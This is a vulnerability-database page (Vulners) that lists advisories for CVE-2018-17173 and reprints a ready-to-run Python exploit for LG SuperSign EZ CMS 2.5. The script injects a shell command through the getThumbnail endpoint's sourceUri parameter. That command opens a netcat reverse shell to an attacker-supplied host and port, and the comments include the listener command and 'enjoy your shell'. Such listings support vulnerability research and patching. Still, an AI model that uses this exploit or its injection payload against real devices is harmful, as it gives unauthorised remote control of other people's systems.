Vulners
Lucene search
LG SuperSign EZ CMS 2.5 - Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | LG Supersign EZ CMS - Remote Code Execution Exploit | 6 May 201900:00 | – | zdt |
 | CVE-2018-17173 | 24 Sep 201812:42 | – | circl |
 | LG SuperSign CMS Remote Code Execution Vulnerability | 26 Sep 201800:00 | – | cnvd |
 | LG SuperSign EZ CMS 2.5 Remote Code Execution (CVE-2018-17173) | 26 Mar 201900:00 | – | checkpoint_advisories |
 | CVE-2018-17173 | 21 Sep 201817:00 | – | cve |
 | CVE-2018-17173 | 21 Sep 201817:00 | – | cvelist |
 | LG SuperSign EZ CMS 2.5 - Remote Code Execution | 24 Sep 201800:00 | – | exploitdb |
| LG Supersign EZ CMS - Remote Code Execution (Metasploit) | 6 May 201900:00 | – | exploitdb |
 | LG SuperSign EZ CMS 2.5 - Remote Code Execution | 24 Sep 201800:00 | – | exploitpack |
| LG Supersign EZ CMS - Remote Code Execution (Metasploit) | 6 May 201900:00 | – | exploitpack |
10
# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution
# Exploit Author: Alejandro Fanjul
# Vendor Homepage:https://www.lg.com
# Software Link: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSignEZ 1.3
# Tested on: LG WebOS 3.10
# CVE : CVE-2018-17173
# 1. Description
# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone
# to remote code execution due to an improper parameter handling
# 2. Proof of concept
# Code to exploit the vulnerability
import requests
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
help="lhost")
parser.add_argument("-p", "--lport", dest="lport",
help="lport")
args = parser.parse_args()
#LG SupersignEZ always run in port 9080, so in target you must type: #LG_SuperSign_IP:9080
#Example
#supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444
#In the attacker machine wait for the shell with nc -lvp 4444
#enjoy your shell
s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')
# 0day.today [2018-09-24] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Sep 2018 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.56237